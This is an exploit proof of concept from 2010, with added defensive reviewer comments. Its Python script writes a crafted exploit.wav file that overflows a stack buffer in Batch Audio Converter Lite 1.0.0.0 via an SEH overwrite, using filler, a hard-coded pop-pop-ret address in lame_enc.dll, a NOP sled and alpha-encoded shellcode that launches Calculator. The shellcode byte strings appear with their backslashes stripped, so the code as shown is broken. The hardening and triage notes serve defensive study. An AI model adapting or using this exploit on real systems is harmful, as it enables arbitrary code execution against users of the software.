
Batch Audio Converter Lite Edition <= v1.0.0.0 Stack Buffer Overflow (SEH)

Posted on 17 June 2010

# ==========================================================================
# Batch Audio Converter Lite Edition <= v1.0.0.0 Stack Buffer Overflow (SEH)
# ==========================================================================
# Software Link: http://www.freesoftwaretoolbox.com/files/batchaudio_setup.exe
# Tested on: Windows XP SP2
# Type of Vuln: SEH
# Code : bacon-exploit.py
# Greetz: Otoy, Postnix, Jasakom Community, Kilurah, Gesang, dan wedus-wedus lainnya ^^
# Thanks: All OffSec member
#
# What this listing does: it builds one string (filler + nseh + seh + nop run
# + shellcode) and writes it to a file named exploit.wav. Per the advisory
# header above, opening such a file in the affected converter overflows a
# stack buffer and overwrites a structured-exception-handler (SEH) record.
#
# Reviewer notes (defensive reading):
# - Root cause, per the title, is an unbounded copy of file data into a
#   fixed-size stack buffer. The page names no fixed version; the durable fix
#   is length validation in the file parser.
# - The handler value is a hard-coded address that the author attributes to
#   lame_enc.dll. Presumably that module loads at a predictable base and is
#   not SafeSEH-protected on the tested system -- confirm against the shipped
#   binary. Relevant build hardening: /SAFESEH, /DYNAMICBASE, /NXCOMPAT, plus
#   SEHOP on Windows versions that support it.
# - Triage signal: the file written here starts with a long run of "A"
#   characters rather than a RIFF/WAVE header, so a .wav file without the
#   "RIFF" magic is a cheap first check. Other samples may carry a valid
#   header, so do not rely on this alone.
# - The author describes the payload as windows/exec with CMD=calc.exe, i.e.
#   a demonstration that launches Calculator.
# - NOTE(review): all string literals below are reproduced exactly as they
#   appear on the page.
#!/usr/bin/python
import struct

# Filler placed ahead of the nseh/seh values; the count is the author's,
# presumably the distance to the SEH record on the tested build -- TODO confirm.
junk = "A" * 4132
# Value written immediately before the handler address (the record's "next" field).
nseh = "xebx06x90x90"
# 32-bit little-endian handler address taken from a DLL bundled with the target.
seh = struct.pack('<L', 0x10029bb7) # pop edi pop esi ret from lame_enc.dll
# Padding run written between the handler address and the payload.
nop = "x90" * 30
print "[+] Preparing for file.."
# windows/exec, CMD=calc.exe, EXITFUNC=seh
# 463 bytes, x86/alpha_mixed
shellcode = ("x89xe3xdbxc6xd9x73xf4x5ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax43x43x43x43x43x43x37x52x59x6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x49"
"x6cx49x78x4dx59x47x70x45x50x45x50x43x50x4cx49"
"x48x65x45x61x4ex32x42x44x4ex6bx50x52x44x70x4c"
"x4bx50x52x44x4cx4ex6bx42x72x45x44x4cx4bx43x42"
"x46x48x44x4fx4dx67x51x5ax46x46x44x71x4bx4fx44"
"x71x49x50x4ex4cx47x4cx51x71x51x6cx43x32x46x4c"
"x51x30x49x51x48x4fx46x6dx45x51x49x57x4dx32x48"
"x70x50x52x42x77x4cx4bx46x32x44x50x4cx4bx43x72"
"x47x4cx47x71x4ex30x4cx4bx47x30x51x68x4fx75x4f"
"x30x42x54x42x6ax46x61x4ax70x46x30x4cx4bx43x78"
"x46x78x4ex6bx43x68x47x50x45x51x4bx63x4bx53x47"
"x4cx47x39x4ex6bx47x44x4ex6bx46x61x48x56x50x31"
"x49x6fx50x31x4fx30x4cx6cx4bx71x4ax6fx44x4dx46"
"x61x48x47x46x58x4dx30x44x35x49x64x43x33x43x4d"
"x48x78x47x4bx51x6dx47x54x51x65x4bx52x43x68x4e"
"x6bx46x38x47x54x47x71x4ex33x43x56x4ex6bx46x6c"
"x50x4bx4cx4bx50x58x45x4cx46x61x4bx63x4ex6bx47"
"x74x4cx4bx43x31x4ax70x4cx49x42x64x44x64x46x44"
"x51x4bx51x4bx43x51x46x39x50x5ax42x71x4bx4fx4b"
"x50x46x38x51x4fx50x5ax4ex6bx45x42x48x6bx4cx46"
"x51x4dx51x7ax46x61x4cx4dx4fx75x4fx49x47x70x43"
"x30x43x30x46x30x42x48x50x31x4ex6bx50x6fx4dx57"
"x49x6fx4bx65x4fx4bx4bx4ex46x6ex50x32x49x7ax43"
"x58x4cx66x4fx65x4fx4dx4fx6dx4bx4fx48x55x47x4c"
"x47x76x51x6cx45x5ax4dx50x4bx4bx4dx30x44x35x43"
"x35x4dx6bx47x37x45x43x42x52x50x6fx51x7ax45x50"
"x51x43x49x6fx4bx65x43x53x45x31x42x4cx43x53x46"
"x4ex45x35x51x68x42x45x43x30x45x5ax41x41")
# Output goes to the current working directory as exploit.wav.
f = open('exploit.wav', 'w')
print "[+] Writing vulnerable WAV file.."
# File layout, in order: filler, nseh, seh, nop run, shellcode.
f.write(junk+nseh+seh+nop+shellcode)
f.close()
print "[+] Success writing file.."
# Inj3ct0r.com [2010-06-17]

 
